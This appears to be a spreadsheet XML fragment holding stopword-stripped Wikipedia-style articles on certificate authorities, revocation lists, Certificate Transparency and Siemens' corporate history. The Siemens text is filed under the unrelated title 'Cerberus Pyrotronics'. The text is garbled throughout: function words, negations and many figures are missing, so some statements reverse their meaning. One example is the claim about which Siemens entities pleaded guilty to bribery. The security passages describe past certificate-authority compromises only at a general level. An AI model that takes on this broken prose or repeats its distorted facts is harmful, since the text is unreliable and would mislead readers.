bank website) sends page information back user's browser, fake web-page send fake public user (for fake site owns matching private key). user fill form personal data submit page. fake web-page access user's data. this certificate authority mechanism intended prevent. certificate authority (ca) organization stores public keys owners, every party communication trusts organization (and knows public key). when user's browser receives public www.bank.example also receives digital signature (with information, so-called x.509 certificate). browser already possesses public consequently verify signature, trust certificate public since www.bank.example uses public certification authority certifies, fake www.bank.example public key. since fake www.bank.example know corresponding private key, cannot create signature needed verify authenticity. security difficult assure correctness match data entity data presented (perhaps electronic network), credentials person/company/program asking certificate likewise presented. this commercial often combination authentication techniques including leveraging government bureaus, payment infrastructure, third parties' databases services, custom heuristics. enterprise systems, local forms authentication kerberos used obtain certificate turn used external relying parties. notaries required cases personally know party whose signature notarized; higher standard reached many cas. according american association outline online transaction management primary points federal state statutes enacted regarding digital signatures "prevent conflicting overly burdensome local regulation establish electronic writings satisfy traditional requirements associated paper documents." further e-sign statute suggested ueta code help ensure that: signature, contract record relating transaction denied legal effect, validity, enforceability solely electronic form; contract relating transaction denied legal effect, validity enforceability solely electronic signature electronic record used formation.despite security measures undertaken correctly verify identities people companies, risk single issuing bogus certificate imposter. also possible register individuals companies similar names, lead confusion. minimize hazard, certificate transparency initiative proposes auditing certificates public unforgeable log, could help prevention phishing.in large-scale deployments, alice familiar bob's certificate authority (perhaps different server), bob's certificate also include ca's public signed different ca2, presumably recognizable alice. this process typically leads hierarchy mesh certificates. certificate revocation authorities webpki provide revocation services allow invalidation previously issued certificates. according baseline requirements ca/browser forum, must maintain revocation status certificate expiration. status must delivered using online certificate status protocol. most revocation statuses internet disappear soon expiration certificates. authority revocation lists authority revocation list (arl) form certificate revocation list (crl) containing certificates issued certificate authorities, contrary crls contain revoked end-entity certificates. industry organizations certificate authority security council (casc) february 2013, casc founded industry advocacy organization dedicated addressing industry issues educating public internet security. founding members seven largest certificate authorities. common computing security standards forum (ccsf) 2009 ccsf founded promote industry standards protect users. comodo group melih abdulhayoğlu considered founder ccsf. ca/browser forum 2005, consortium certificate authorities browser vendors formed promote industry standards baseline requirements internet security. comodo group melih abdulhayoğlu organized first meeting considered founder ca/browser forum. baseline requirements ca/browser forum publishes baseline requirements, list policies technical requirements follow. these requirement inclusion certificate stores firefox safari. compromise subverted, security entire system lost, potentially subverting entities trust compromised example, suppose attacker, eve, manages issue certificate claims represent alice. that certificate would publicly state represents alice, might include information alice. some information alice, employer name, might true, increasing certificate's credibility. eve, however, would all-important private associated certificate. could certificate send digitally signed email bob, tricking believing email alice. might even respond encrypted email, believing could read alice, actually able decrypt using private key. notable case subversion like occurred 2001, certificate authority verisign issued certificates person claiming represent microsoft. certificates name "microsoft corporation", could used spoof someone believing updates microsoft software came microsoft actually not. fraud detected early 2001. microsoft verisign took steps limit impact problem.in 2008, comodo reseller certstar sold certificate mozilla.com eddy nigg, authority represent mozilla.in 2011 fraudulent certificates obtained comodo diginotar, allegedly iranian hackers. there evidence fraudulent diginotar certificates used man-in-the-middle attack iran.in 2012, became known trustwave issued subordinate root certificate used transparent traffic management (man-in-the-middle) effectively permitted enterprise sniff internal network traffic using subordinate certificate. storage attacker steals certificate authority's private keys able forge certificates without needed ongoing access ca's systems. theft therefore main risks certificate authorities defend against. publicly trusted almost always store keys hardware security module (hsm), allows sign certificates key, generally prevent extraction physical software controls. typically take precaution keeping long-term root certificates kept offline, except needed sign shorter-lived intermediate certificates. intermediate certificates, stored online hsm, day-to-day work signing end-entity certificates keeping revocation information date. sometimes ceremony generating signing keys, order ensure keys tampered copied. implementation weakness trusted third party scheme critical weakness current x.509 scheme implemented trusted particular party issue certificates domain choose. such certificates accepted valid trusting party whether legitimate authorized not. this serious shortcoming given commonly encountered technology employing x.509 trusted third parties https protocol. major browsers distributed end-users pre-configured list trusted numbers dozens means pre-approved trusted issue valid certificate domain whatsoever. industry response muted. given contents browser's pre-configured trusted list determined independently party distributing causing installed browser application really nothing this issue driving impetus behind development dns-based authentication named entities (dane) protocol. adopted conjunction domain name system security extensions (dnssec) dane greatly reduce eliminate role trusted third parties domain's pki. also validation authority contact page people internet responsibility trust chain trust digital signature diginotar certificate authority breach comodo certificate authority breach references external links secure https today? often attacked?, electronic frontier foundation october 2011)</t>
  </si>
  <si>
    <t>Certificate revocation list</t>
  </si>
  <si>
    <t>cryptography, certificate revocation list crl) list digital certificates revoked issuing certificate authority (ca) scheduled expiration date longer trusted". crls longer required ca/browser forum, alternate certificate revocation technologies (such ocsp) increasingly used instead. nevertheless, crls still widely used cas. revocation states there different states revocation defined 5280: revoked certificate irreversibly revoked example, discovered certificate authority (ca) improperly issued certificate, private-key thought compromised. certificates also revoked failure identified entity adhere policy requirements, publication false documents, misrepresentation software behaviour, violation policy specified operator customer. common reason revocation user longer sole possession private (e.g., token containing private lost stolen). hold this reversible status used note temporary invalidity certificate (e.g., user unsure private lost). example, private found nobody access status could reinstated, certificate valid again, thus removing certificate future crls. reasons revocation reasons revoke certificate according 5280 are: unspecified keycompromise cacompromise affiliationchanged superseded cessationofoperation certificatehold removefromcrl privilegewithdrawn aacompromise (10)note value used. publishing revocation lists generated published periodically, often defined interval. also published immediately certificate revoked. issued issuer, typically also issued corresponding certificates, could alternatively trusted authority. crls lifetime valid; timeframe often hours less. during crl's validity period, consulted pki-enabled application verify certificate prior use. prevent spoofing denial-of-service attacks, crls usually carry digital signature associated published. validate specific prior relying certificate corresponding needed. certificates maintained often x.509/public certificates, format commonly used schemes. revocation versus expiration expiration dates substitute crl. while expired certificates considered invalid, unexpired certificates valid. crls certificate validation techniques necessary part properly operated pki, mistakes certificate vetting management expected occur real world operations. noteworthy example, certificate microsoft mistakenly issued unknown individual, successfully posed microsoft contracted maintain activex 'publisher certificate' system (verisign). microsoft need patch cryptography subsystem would check status certificates trusting them. short-term fix, patch issued relevant microsoft software (most importantly windows) specifically listing certificates question "revoked". problems certificate revocation lists best practices require wherever however certificate status maintained, must checked whenever wants rely certificate. failing this, revoked certificate incorrectly accepted valid. this means effectively, must access current crls. this requirement on-line validation negates original major advantages symmetric cryptography protocols, namely certificate "self-authenticating". symmetric systems kerberos also depend existence on-line services distribution center case kerberos). existence implies need someone organization) enforce policy revoke certificates deemed counter operational policy. certificate mistakenly revoked, significant problems arise. certificate authority tasked enforcing operational policy issuing certificates, typically responsible determining revocation appropriate interpreting operational policy. necessity consulting certificate status service) prior accepting certificate raises potential denial-of-service attack pki. acceptance certificate fails absence available valid crl, operations depending upon certificate acceptance take place. this issue exists kerberos systems well, failure retrieve current authentication token prevent system access. alternative using crls certificate validation protocol known online certificate status protocol (ocsp). ocsp primary benefit requiring less network bandwidth, enabling real-time near real-time status checks high volume high-value operations. firefox mozilla announced deprecating favour ocsp.crl files grow quite large time e.g. government, certain institution multiple megabytes. therefore, incremental crls designed sometimes referred "delta crls". however, clients implement them. authority revocation lists authority revocation list (arl) form containing revoked certificates issued certificate authorities, contrary crls contain revoked end-entity certificates. also trusted third party trust certificate server ocsp references</t>
  </si>
  <si>
    <t>Certificate authority</t>
  </si>
  <si>
    <t>Certificate Transparency</t>
  </si>
  <si>
    <t>certificate transparency (ct) internet security standard monitoring auditing issuance digital certificates. standard creates system public logs seek eventually record certificates issued publicly trusted certificate authorities, allowing efficient identification mistakenly maliciously issued certificates. version certificate transparency mechanism, latest, described experimental 9162, obsoletes earlier version described 6962. technical overview certificate transparency system consists system append-only certificate logs. logs operated many group parties, including browser vendors certificate authorities. certificates support certificate transparency must include signed certificate timestamps (scts), promise operator include certificate within maximum merge delay (mmr). point within maximum merge delay, operator adds certificate log. each entry references hash previous one, forming merkle tree. signed tree head (sth) references current root merkle tree. mandatory certificate transparency some browsers require certificates proof logged certificate transparency, either scts embedded certificate, extension handshake, ocsp: sharding large quantities certificates issued pki, certificate transparency logs grow contain many certificates. this large quantity certificates cause strain logs. temporal sharding method reduce strain logs sharding multiple logs, shard accept precertificates/certificates expiration date particular time period (usually calendar year). cloudflare's nimbus series logs first temporal sharding. background advantages problems digital certificate management fraudulent certificates take long time spotted, reported revoked. issued certificate logged using certificate transparency never spotted all. certificate transparency makes possible domain owner (and anyone interested) knowledge certificate issued domain. certificate transparency logs certificate transparency depends verifiable certificate transparency logs. appends certificates ever-growing merkle hash tree.: section seen behaving correctly, must: verify submitted certificate precertificate valid signature chain leading back trusted root certificate authority certificate. refuse publish certificates without valid signature chain. store entire verification chain newly accepted certificate back root certificate. present chain auditing upon request.a accept certificates fully valid certificates expired. certificate transparency monitors monitors clients servers. monitors check logs make sure behaving correctly. inconsistency used prove behaved correctly, signatures log's data structure (the merkle tree) prevent denying misbehavior. certificate transparency auditors auditors also clients servers. certificate transparency auditors partial information verify partial information have.: section certificate transparency programs apple google separate programs distinct policies lists trusted logs. root stores certificate transparency logs certificate transparency logs maintain root stores accept certificates chain back trusted roots. number misbehaving logs publishing inconsistent root stores past. history 2011, reseller certificate authority comodo attacked certificate authority diginotar compromised, demonstrating existing flaws certificate authority ecosystem prompting work various mechanisms prevent monitor unauthorized certificate issuance. google employees laurie, adam langley emilia kasper began work open source framework detecting mis-issued certificates year. 2012, submitted first draft standard ietf code-name "sunlight".in march 2013, google launched first certificate transparency log. september 2013, digicert became first certificate authority implement certificate transparency.in 2015, google chrome began requiring certificate transparency newly issued extended validation certificates. began requiring certificate transparency certificates newly issued symantec june 2016, found issued certificates without domain owners' knowledge. since april 2018, requirement extended certificates.on march 2018, cloudflare announced named nimbus.in march 2018, "certificate transparency version 2.0" draft published.in may, 2019, certificate authority let's encrypt launched called oak. since february 2020, included approved lists usable publicly-trusted certificate authorities.in december 2021, ietf 9162 “certificate transparency version 2.0” published. ctv2.0 revises obsoletes ctv1.0 protocol, drawing insights ctv1.0's deployments feed-backs community. version includes major changes required structure certificate, well support ed25519 signature algorithm scts support including certificate inclusion proofs along sct. february 2022, google published update policy, removes requirement certificates include service, matching requirements certificates previously published apple. signature algorithms certificate transparency version 1.0, must nist p-256 curve, signatures (using least 2048 bits).:section 2.1.4in updated certificate transparency version standard, allowed algorithms nist p-256, deterministic ecdsa, ed25519. tools inspecting logs crt.sh sectigo censys search cert spotter sslmate certstream.calidog.io ct.cloudflare.com merkle town cloudflare meta certificate transparency monitoring meta certificate transparency root explorer references external links official website 6962 certificate transparency internet engineering task force 9162 certificate transparency version internet engineering task force crt.sh, certificate transparency search engine google certificate transparency report certificate transparency monitoring meta test badssl.com</t>
  </si>
  <si>
    <t>Cerberus Pyrotronics</t>
  </si>
  <si>
    <t>siemens (german pronunciation: [ˈziːməns] (listen) [-mɛns]) german multinational conglomerate corporation largest industrial manufacturing company europe headquartered munich branch offices abroad. principal divisions corporation industry, energy, healthcare (siemens healthineers), infrastructure cities, represent main activities corporation. corporation prominent maker medical diagnostics equipment medical health-care division, generates percent corporation's total sales, second-most profitable unit, industrial automation division. corporation component euro stoxx stock market index. siemens subsidiaries employ approximately 303,000 people worldwide reported global revenue around billion 2021 according earnings release. history 1847 1901 siemens halske founded werner siemens johann georg halske october 1847. based telegraph, invention used needle point sequence letters, instead using morse code. company, called telegraphen-bauanstalt siemens halske, opened first workshop october.in 1848, company built first long-distance telegraph line europe; berlin frankfurt main. 1850, founder's younger brother, carl wilhelm siemens, later william siemens, started represent company london. london agency became branch office 1858. 1850s, company involved building long-distance telegraph networks russia. 1855, company branch headed another brother, carl heinrich siemens, opened petersburg, russia. 1867, siemens completed monumental indo-european telegraph line stretching 11,000 london calcutta. 1867, werner siemens described dynamo without permanent magnets. similar system also independently invented ányos jedlik charles wheatstone, siemens became first company build devices. 1881, siemens alternator driven watermill used power world's first electric street lighting town godalming, united kingdom. company continued grow diversified electric trains light bulbs. 1885, siemens sold generators george westinghouse, thereby enabling westinghouse begin experimenting networks pittsburgh, pennsylvania. 1887, siemens opened first office japan. 1890, founder retired left running company brother carl sons arnold wilhelm. 1892, siemens contracted construct hobart electric tramway tasmania, australia increased markets. system opened 1893 became first complete electric tram network southern hemisphere. 1901 1933 siemens halske incorporated 1897, merged parts activities schuckert co., nuremberg 1903 become siemens-schuckert. 1907, siemens (siemens halske siemens-schuckert) 34,324 employees seventh-largest company german empire number employees. (see list german companies employees 1907) 1919, companies jointly formed osram lightbulb company. during 1920s 1930s, started manufacture radios, television sets, electron microscopes.in 1932, reiniger, gebbert schall (erlangen), phönix (rudolstadt) siemens-reiniger-veifa (berlin) merged form siemens-reiniger-werke (srw), third so-called parent companies merged 1966 form present-day siemens ag.in 1920s, siemens constructed ardnacrusha hydro power station river shannon irish free state, world first design. company remembered desire raise wages under-paid workers overruled cumann ngaedheal government. 1933 1945 siemens time: siemens-schuckert) exploited forced labour deported people extermination camps. company owned plant auschwitz concentration camp. siemens exploited forced labour women concentration camp ravensbrück. factory located front camp.during final years world numerous plants factories berlin major cities destroyed allied raids. prevent losses, manufacturing therefore moved alternative places regions affected war. goal secure continued production important war-related everyday goods. according records, siemens operating almost alternative relocated manufacturing plants 1944 early 1945. 1972, siemens sued german satirist f.c. delius satirical history company, unsere siemen swelt, determined much book contained false claims although trial publicized siemens' history nazi germany. company supplied electrical parts nazi concentration camps death camps. factories poor working conditions, malnutrition death common. also, scholarship shown camp factories created, run, supplied conjunction company officials, sometimes high-level officials. 1945 2001 1950s, base bavaria, started manufacture computers, semiconductor devices, washing machines, pacemakers. 1966, siemens halske (s&amp;h, founded 1847), siemens-schuckertwerke (ssw, founded 1903) siemens-reiniger-werke (srw, founded 1932) merged form siemens 1969, siemens formed kraftwerk union pooling nuclear power businesses. company's first digital telephone exchange produced 1980. 1988, siemens acquired defence technology company plessey. plessey's holdings split, siemens took avionics, radar traffic control businesses—as siemens plessey. 1977, advanced micro devices (amd) entered joint venture siemens, wanted enhance technology expertise enter american market. siemens purchased amd's stock, giving company infusion cash increase product lines. companies also jointly established advanced micro computers (amc), located silicon valley germany, allowing enter microcomputer development manufacturing field, particular based amd's second-source zilog z8000 microprocessors. when companies' vision advanced micro computers diverged, bought siemens' stake american division 1979. closed advanced micro computers late 1981 switching focus manufacturing second-source intel microprocessors.in 1985, siemens bought allis-chalmers' interest partnership company siemens-allis (formed 1978) supplied electrical control equipment. incorporated siemens' energy automation division.in 1987, siemens reintegrated kraftwerk union, unit overseeing nuclear power business.in 1989, siemens bought solar photovoltaic business, including solar module manufacturing plants, industry pioneer arco solar, owned firm arco.in 1991, siemens acquired nixdorf computer renamed siemens nixdorf informationssysteme order produce personal computers.in october 1991, siemens acquired industrial systems division texas instruments, inc, based johnson city, tennessee. this division organized siemens industrial automation, inc., later absorbed siemens energy automation, inc. 1992, siemens bought ibm's half rolm (siemens bought rolm five years earlier), thus creating siemensrolm communications; eventually dropping rolm name later 1990s.in 1993–1994, siemens c651 electric trains singapore's mass rapid transit (mrt) system built austria.in 1997, siemens agreed sell defence siemens plessey british aerospace (bae) german aerospace company, daimlerchrysler aerospace. dasa acquired british german divisions operation respectively.in october 1997, siemens financial services (sfs) founded competence center financing issues manager financial risks within siemens. 1998, siemens acquired westinghouse power generation $1.5 billion corporation moving siemens third second world power generation market.in 1999, siemens' semiconductor operations spun company called infineon technologies. electromechanical components operations converted legally independent company: siemens electromechanical components gmbh (which, later year, sold tyco international approximately $1.1 billion.in year, siemens nixdorf informationssysteme became part fujitsu siemens computers retail banking technology group becoming wincor nixdorf.in 2000, shared medical systems corporation acquired siemens' medical engineering group, eventually becoming part siemens medical solutions. also 2000, atecs-mannesman acquired siemens, sale finalised april 2001 shares acquired, acquisition, mannesmann merged siemens automotive forming siemens automotive atecs mannesmann dematic systems merged siemens production logistics forming siemens dematic mannesmann demag delaval merged power generation division siemens other parts company acquired robert bosch gmbh time. also, moore products spring house, acquired siemens energy automation, inc. 2001 2005 2001, chemtech group brazil incorporated siemens group; provides industrial process optimisation, consultancy engineering services.also 2001, siemens formed joint venture framatome areva france merging much companies' nuclear businesses.in 2002, siemens sold business activities kohlberg kravis roberts l.p. (kkr), metering business included sale package.in 2002, siemens abandoned solar photovoltaic industry selling participation joint-venture company, established 2001 shell e.on, shell.in 2003, siemens acquired flow division danfoss incorporated automation drives division. also 2003 siemens acquired indx software (realtime data organisation presentation). year unrelated development siemens reopened office kabul. also 2003 agreed alstom industrial turbines; manufacturer small, medium industrial turbines €1.1 billion. february 2003, siemens planned shorten phones' shelf life bringing annual xelibri lines, devices launched spring -summer autumn-winter collections. march 2003, company opened office jose. march 2003, company announced planned gain cent mainland china market handsets. march 2003, company unveiled latest series xelibri fashion phones.in 2004, wind energy company bonus energy brande, denmark acquired, forming siemens wind power division. also 2004 siemens invested dasan networks (south korea, broadband network equipment) acquiring ~40% shares, nokia siemens disinvested shares 2008. year siemens acquired photo-scan (uk, cctv systems), filter corporation (water waste water treatment technologies/ solutions, acquired veolia), hunstville electronics corporation (automobile electronics, acquired chrysler), chantry networks (wlan equipment).in 2005, siemens sold siemens mobile manufacturing business benq, forming benq-siemens division. also 2005 siemens acquired flender holding gmbh (bocholt, germany, gears/industrial drives), bewator (building security systems), wheelabrator pollution control, inc. (industrial power station dust control systems), windenergie gmbh. (wind energy), power technologies inc. (schenectady, usa, energy industry software training), molecular imaging (positron emission tomography molecular imaging systems), myrio (iptv systems), shaw power technologies international (uk/usa, electrical engineering consulting, acquired shaw group), transmitton (ashby zouch rail industry control asset management). 2005 continuing: worldwide bribery scandal beginning 2005, siemens became embroiled multi-national bribery scandal. component scandal siemens greek bribery scandal deals siemens greek government officials 2004 summer olympic games. siemens' activities came legal scrutiny complaints prosecutors italy, liechtenstein switzerland lead german authorities opening investigations, followed investigation 2006 concerning activities listed stock exchanges. investigators found bribing officials contracts standard operating procedure. over time period company paid around $1.3 billion bribes many countries kept separate books hide them. settlement negotiations took place 2008 settlement terms announced december 2008. company paid total $1.6 billion, around $800 million germany each. this largest bribery fine history, time. company also obligated spend billion setting funding internal compliance regimens. siemens pleaded guilty violating accounting provisions foreign corrupt practices act; parent company plead guilty paying bribes (although bangladesh venezuela subsidiaries did). 2005 germany opened investigations siemens business practices worldwide, prompted requests prosecutors italy, liechtenstein switzerland; investigators joined 2006 investigators addressed violations since 2001, siemens started selling shares stock exchange. investigators found bribing officials contracts standard operating procedure. over time period company paid around $1.3 billion bribes many countries kept separate books hide them.fines anticipated high billion investigation unfolded. settlement negotiations took place 2008 announced december less, driven part siemens' cooperation, part imminent change administrations (the obama administration take bush administration), part dependence military siemens contractor.the company paid total $1.6 billion, around $800 million germany. this largest bribery fine history, time. money paid germany included $270 million fine paid year (related bribes nigeria). payment included $450 million fines penalties forfeiture $350 million profits. company also obligated spend billion setting funding internal compliance regimens. siemens pleaded guilty violating accounting provisions foreign corrupt practices act; parent company plead guilty paying bribes (although bangladesh venezuela subsidiaries did); guilty plea would barred siemens contracting government. scandal started breaking, siemens fired chairman heinrich pierer, hired first non-german ceo, peter löscher; also appointed lawyer, peter solmssen independent director board, charge compliance, accepted oversight theo waigel, former german finance minister, "compliance monitor". compliance overhaul eventually entailed hiring around full-time compliance personnel worldwide. siemens also enacted series anti-corruption compliance policies, including anti-corruption handbook, web-based tools diligence compliance, confidential communications channel employees report irregular business practices, corporate disciplinary committee impose appropriate disciplinary measures substantiated misconduct.the culture bribery siemens, 1914 scandal japan bribes paid siemens vickers japanese naval authorities shipbuilding contracts.the culture bribery developed within siemens world attempted rebuild business competing developing world, bribery common. until 1999 germany, bribes tax-deductible business expense, penalties bribing foreign officials. 1999 oecd anti-bribery convention came effect, germany party, siemens started off-shore accounts means hiding bribery. investigation opened midlevel executive telecommunications unit, reinhard siekaczek, identified player; siekaczek quit siemens 2005 company required sign document saying followed company policy, turned state's evidence investigators documents saved documents. controlled annual global bribery budget million. usual method bribery local insider "contractor" would turn pass money government officials; part settlement siemens disclosed 2,700 contractors worldwide. bribes generally around contract's value corrupt countries could high 40%. paid highest bribes argentina, israel, venezuela, china, nigeria, russia.examples bribery investigation found included: million bribes argentina billion contract make national identity cards. million israel contract build power plants million venezuela urban rail lines. million china medical equipment $12.7 million payments nigeria million bangladesh mobile phones $1.7 million iraq saddam hussein others.the investigation directly several prosecutions unfolding, settlements governments prosecution siemens employees bribe recipients various countries. 2007 german court convicted former executives paying million bribes 1999 2002 help siemens natural turbine supply contracts enel, italian energy company. contracts valued €450 million. siemens fined million.in july 2009, siemens settled allegations fraud russian affiliate world bank-funded mass transit project moscow agreeing world bank projects years, allowing russian affiliate world bank funded work four years, setting $100 million fund world bank fund anti-corruption activities years, world bank veto audit rights; fund became "siemens integrity initiative". first payments made funds 2010 tranche million. second projects funded 2014 totaling million.siemens paid billion nigerian government 2010.in 2012, greek government settled greek bribery scandal million euros. trial persons accused involvement scandal began february 2017. total individuals accused, greek german nationals. central figure scandal however, ex-siemens chief executive greece michael christoforakos, european arrest warrants pending likely absent, germany refuses extradition day. initially arrested germany 2009, accusations german courts dropped, since lives free country. greece demanding extradition since 2009, considers fugitive justice. 2014 former siemens executive andres truppel pleaded guilty funneling nearly $100 million bribes argentine government officials card project siemens.in 2014 israeli prosecutors decreed siemens us$42.7 million penalty appoint external inspector supervise business israel exchange state prosecutors dropping charges securities fraud. according indictment, "siemens systematically paid bribes israel electric corporation executives would utilize positions order favor advance interests siemens". 2006 2011 2006, siemens purchased bayer diagnostics incorporated medical solutions diagnostics division january 2007, also 2006 siemens acquired controlotron (new york) (ultrasonic flow meters), also 2006 siemens acquired diagnostic products corp., kadon electro mechanical services ltd. (now turbocare canada ltd.), kühnle, kopp, kausch opto control, vistascape security systems.in january 2007, siemens fined €396 million european commission price fixing electricity markets cartel involving companies, including abb, alstom, fuji electric, hitachi japan, power systems, mitsubishi electric corp, schneider, areva, toshiba tech. according commission, "between 1988 2004, companies rigged bids procurement contracts, fixed prices, allocated projects other, shared markets exchanged commercially important confidential information." siemens given highest fine €396 million, half total, alleged leadership role activity. march 2007, siemens board member temporarily arrested accused illegally financing business-friendly labour association competes union metall. released bail. offices labour union siemens searched. siemens denies wrongdoing. april fixed networks, mobile networks carrier services divisions siemens merged nokia's network business group 50/50 joint venture, creating fixed mobile network company called nokia siemens networks. nokia delayed merger bribery investigations siemens. october 2007, court munich found company bribed public officials libya, russia, nigeria return awarding contracts; four former nigerian ministers communications among named recipients payments. company admitted paid bribes agreed fine million euros. december 2007, nigerian government cancelled contract siemens bribery findings.also 2007, siemens acquired ingdesi automation (argentina, industrial automation), corp., dade behring, sidelco (quebec, canada), engineers inc., gesellschaft systemforschung dienstleistungen gesundheitswesen (gsd) (germany).in july 2008, siemens formed joint venture enterprise communications business gores group, renamed unify 2013. gores group holding majority interest stake, siemens holding minority interest 49%.in august 2008, siemens project ventures invested million arava power company. press release published month, peter löscher, president siemens said: "this investment another consequential step strengthening green sustainable technologies". siemens holds stake company.in january 2009, siemens sold stake framatome, complaining limited managerial influence. march, formed alliance rosatom russia engage nuclear-power activities.in april 2009, fujitsu siemens computers became fujitsu technology solutions result fujitsu buying siemens' share company. june 2009 news broke nokia siemens supplied telecommunications equipment iranian telecom company included ability intercept monitor telecommunications, facility known "lawful intercept". equipment believed used suppression 2009 iranian election protests, leading criticism company, including european parliament. nokia siemens later divested call monitoring business, reduced activities iran.in october 2009, siemens signed $418 million contract solel solar systems, israeli company solar thermal power business.in december 2010, siemens agreed sell solutions services subsidiary €850 million atos. part deal, siemens agreed take stake enlarged atos, held minimum five years. addition, siemens concluded seven-year outsourcing contract worth around €5.5 billion, atos provide managed services systems integration siemens. 2011 present march 2011, decided list osram stock market autumn, peter löscher said siemens intended retain long-term interest company, already independent technological managerial viewpoints. september 2011, siemens, responsible constructing germany's existing nuclear power plants, announced would exit nuclear sector following fukushima disaster subsequent changes german energy policy. chief executive peter löscher supported german government's planned energiewende, transition renewable energy technologies, calling "project century" saying berlin's target reaching renewable energy sources 2020 feasible.in november 2012, siemens acquired rail division invensys £1.7 billion. month, siemens acquired privately held company, international nv.in august 2013, nokia acquired 100% company nokia siemens networks, buy-out siemens ending siemens role telecommunication.in august 2013, siemens $966.8 million order power plant components firm saudi aramco, largest ever received saudi company.in 2014, siemens announced plans build $264 million facility making offshore wind turbines paull, england, britain's wind power rapidly expands. siemens chose hull area east coast england close large offshore projects planned coming years. plant expected begin producing turbine rotor blades 2016. plant associated service center, green port hull nearby, employ 1,000 workers. facilities serve market, electricity major power producers generate wind grew percent 2013, representing percent total electricity, according government figures. there also plans increase britain's wind-generating capacity least threefold 2020, gigawatts.in 2014, rolls-royce agreed sell turbine compressor energy business siemens billion.in june 2014, siemens mitsubishi heavy industries announced formation joint ventures alstom's troubled energy transportation businesses locomotives, steam turbines, aircraft engines). rival general electric (ge) criticized french government sources, consider alstom's operations "vital national interest" moment french unemployment level stands voters turning towards far-right.in 2015, siemens acquired u.s. oilfield equipment maker dresser-rand group $7.6 billion.in november 2016, siemens acquired company mentor graphics $4.5 billion.in november 2017, u.s. department justice charged three chinese employees guangzhou information technology company limited hacking corporate entities, including siemens ag.in december 2017, siemens acquired medical technology company fast track diagnostics undisclosed amount.in august 2018, siemens acquired rapid application development company mendix €0.6 billion cash.in 2018, siemens acquired innovations undisclosed amount.in 2018, siemens acquired enlighted, inc. undisclosed amount.in september 2019, siemens orascom construction signed agreement iraqi government rebuild power plants, believed setup company future deals country.in 2019–2020, siemens identified engineering company supporting controversial adani carmichael coal mine queensland (australia).in january 2020, siemens signed agreement acquire equity share capital indian switchgear manufacturer electric €267 million (₹2,100 crore). takeover approved competition commission india august 2020.in april 2020, siemens acquired majority stake indian building solution provider imetrex technologies undisclosed sum.in april 2020, siemens energy created independent company energy division siemens. trading shares siemens energy stock exchange expected possible september onwards.in august 2020, siemens healthineers announced plans acquire u.s. cancer device software company varian medical systems all-stock deal valued $16.4 billion.in october 2021, siemens acquired building software hardware company wattsense undisclosed sum.in 2022, siemens decided drop russian operations everything regarding conglomerate russian state amid ongoing aggresion ukraine since february 24th. july 2022, siemens acquired zona technology, specialist aerospace simulation firm. products, services contribution siemens offers wide range electrical engineering- electronics-related products services. products broadly divided following categories: buildings-related products; drives, automation industrial plant-related products; energy-related products; lighting; medical products; transportation logistics-related products.siemens buildings-related products include building-automation equipment systems; building-operations equipment systems; building fire-safety equipment systems; building-security equipment systems; low-voltage switchgear including circuit protection distribution products.siemens drives, automation industrial plant-related products include motors drives conveyor belts; pumps compressors; heavy duty motors drives rolling steel mills; compressors pipelines; mechanical components including gears wind turbines cement mills; automation equipment systems controls production machinery machine tools; industrial plant water processing material processing.siemens energy-related products include steam turbines; generators; compressors; offshore wind turbines; high-voltage transmission products; power transformers; high-voltage switching products systems; alternating direct current transmission systems; medium-voltage components systems; power automation products.in renewable energy industry, company provides portfolio products services help build operate microgrids size. provides generation distribution electrical energy well monitoring controlling microgrids. using primarily renewable energy, microgrids reduce carbon-dioxide emissions, often required government regulations. supplied sustainable storage produc microgrid enel produzione island ventotene italy.siemens medical products include clinical information technology systems; hearing instruments; in-vitro diagnostics equipment; imaging equipment including angiography, computed tomography, fluoroscopy, magnetic resonance, mammography, molecular imaging ultrasound, x-ray equipment; radiation oncology particle therapy equipment. 2015, siemens finalized sale hearing-aid (hearing instruments) business sivantos.siemens transportation logistics-related products include equipment systems rail transportation including rail vehicles mass transit, regional long-distance transportation, locomotives, equipment systems rail electrification, central control systems, interlockings, automated train controls; equipment systems road traffic including traffic detection, information guidance; equipment systems airport logistics including cargo tracking baggage handling; equipment systems postal automation including letter parcel sorting. operations siemens incorporated germany corporate headquarters munich. 2011, operations around countries approximately production manufacturing facilities. siemens around 360,000 employees september 2011. research development 2011, siemens invested total €3.925 billion research development, equivalent 5.3% revenues. september 2011, siemens approximately 11,800 germany-based employees engaged research development approximately 16,000 rest world, majority based either austria, china, croatia, denmark, france, india, japan, mexico, netherlands, russia, slovakia, sweden, switzerland, united kingdom united states. september 2011, siemens held approximately 53,300 patents worldwide. joint ventures siemens' current joint ventures include: siemens traction equipment ltd. (stez), zhuzhou china, joint venture siemens, zhuzhou times electric co., ltd. (tec) zhuzhou electric locomotive co., ltd. (zelc), produces drive electric locomotives locomotive traction components. primetals technologies joint venture siemens metals technologies mitsubishi hitachi metals machinery formed 2015. omnetric group, siemens accenture company formed 2014.former joint ventures include: silcar joint venture siemens thiess services 2013. silcar 3,000 person australian organisation providing productivity reliability large scale technically complex plant assets. services include asset management, design, construction, operations maintenance. silcar operates across range industries essential services including power generation, electrical distribution, manufacturing, mining telecommunications. july 2013, thiess took full control. finances fiscal year 2017, siemens reported earnings 6.046 billion, annual revenue €83.049 billion, increase 4.3% previous fiscal cycle. siemens' shares traded us$58 share, market capitalization valued us$95.3 billion november 2018. november 2019, company higher fourth quarter earnings expected, adjusted earnings interest, taxes, amortization totaling €2.64 billion ($2.92 billion), warned slowdown, especially sector, next year. 2020 siemens energy became independent company shareholders company issued 881,000,000 shares common stock. largest single shareholder continues founding shareholder, siemens family, stake 6.9%. held institutional asset managers, largest divisions world's largest asset manager blackrock. 83.97% shares considered public float, however including strategic investors state qatar (dic company ltd.) 3.04%, government pension fund norway 2.5% siemens 3.04%. held private investors, investors considered unidentifiable. owned german investors, investors, followed (11%), france (8%), switzerland (8%) number others (26%). senior management chairmen siemens-schuckertwerke managing board (1903 1966) alfred berliner (1903 1912) carl friedrich siemens (1912 1919) otto heinrich (1919 1920) carl köttgen (1920 1939) rudolf bingel (1939 1945) wolf-dietrich witzleben (1945 1949) günther scharowsky (1949 1951) friedrich bauer (1951 1962) bernhard plettner (1962 1966)chairmen siemens halske siemens-schuckertwerke supervisory board (1918 1966) wilhelm siemens (1918 1919) carl friedrich siemens (1919 1941) hermann siemens (1941 1946) friedrich carl siemens (1946 1948) hermann siemens (1948 1956) ernst siemens (1956 1966)chairmen siemens managing board (1966 present) hans kerschbaum, adolf lohse, bernhard plettner (presidency managing board) (1966 1967) erwin hachmann, bernhard plettner, gerd tacke (presidency managing board) (1967 1968) gerd tacke (1968 